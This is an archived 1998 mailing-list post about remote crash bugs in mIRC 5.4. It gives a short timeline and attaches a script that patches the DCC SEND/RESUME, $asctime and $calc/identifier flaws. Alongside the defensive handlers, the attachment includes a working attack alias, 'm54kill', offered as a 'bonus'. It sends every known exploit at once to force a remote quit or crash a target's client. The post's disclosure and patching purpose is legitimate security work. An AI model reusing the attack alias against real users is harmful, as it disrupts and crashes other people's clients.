Another NEW mIRC bug and ALL mIRC Exploit patches

From: Derek Reynolds (derekat_private)
Date: Fri Jul 24 1998 - 05:17:51 PDT

Next message: John Goerzen: "CFINGERD root security hole"

Previous message: Lloyd Vancil: "small bug in 5/98 distribution Sun 4070627"
Next in thread: Mike Zimmerman: "Re: Another NEW mIRC bug and ALL mIRC Exploit patches"
Reply: Mike Zimmerman: "Re: Another NEW mIRC bug and ALL mIRC Exploit patches"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--=====================_901297071==_
Content-Type: text/plain; charset="us-ascii"

History of Events: (Remote Exploits)

 07/18/98 - Someone on DALnet finds problem with DCC SEND and DCC RESUME
(exploit made)

 07/20/98 - $asctime bug revealed

 07/21/98 - myn discovers a large problem with $calc and notices that most
scripts that
            use on ctcpreply ping perform a  $calc. He then implements the
$asctime bug
            into on ctcpreply ping which ables a user to remotely crash the
mIRC client

 07/22/98 - v9 evaluates myn's bug finding and plays with on ctcpreply some
more and                finds that $calc evaluates custom alias's or functions.

 07/23/98 - Some uninformed person believes that it is on IRCN native and
posts a             message to rootshell.com and forgets the big picture.
Any mIRC script that             makes use of the event "ON CTCPREPLY PING"
which does a $calc or any other             remote/event that uses $calc is
exploitable.


Most people are only patching themselves against the $calc bug, but are
still wondering why their mIRC keeps crashing.. Its because they have not
patched themselves against the 2 other remote mIRC exploits.

Below is the patch for ALL known remote mIRC exploits.
to install it type "/load -rs m54-fix-sploits.mrc"

Peace.

myn@efnet



--=====================_901297071==_
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: attachment; filename="m54fix-sploits.mrc"

;mIRC 5.4 QuickFIX and Exploits
;myn@efnet - 07/22/98


;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98)

;DCC exploit fix
ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }
ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }

;ctcpreply ping $asctime crash and $identifier Exploit fix
;replace all instances of the event "on ctcpreply" with the one below

on 1:CTCPREPLY:PING* {
  if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
  if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick   | halt }
  echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s)
  halt
}

;And as an added bonus for all you DALnet kiddies
;This sends all known mIRC 5.4 exploits at once
alias m54kill {
  if ($1) {
    .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
    %ip = $rand(600000000,4294967294)
    .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
    .ctcpreply $1 ping $!asctime(2147483647)
    echo -a * Sent mIRC kills to $1
    halt
  }
  echo -a * Parms [/m54kill nick/#channel]
}
--=====================_901297071==_--

Next message: John Goerzen: "CFINGERD root security hole"
Previous message: Lloyd Vancil: "small bug in 5/98 distribution Sun 4070627"
Next in thread: Mike Zimmerman: "Re: Another NEW mIRC bug and ALL mIRC Exploit patches"
Reply: Mike Zimmerman: "Re: Another NEW mIRC bug and ALL mIRC Exploit patches"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:07:49 PDT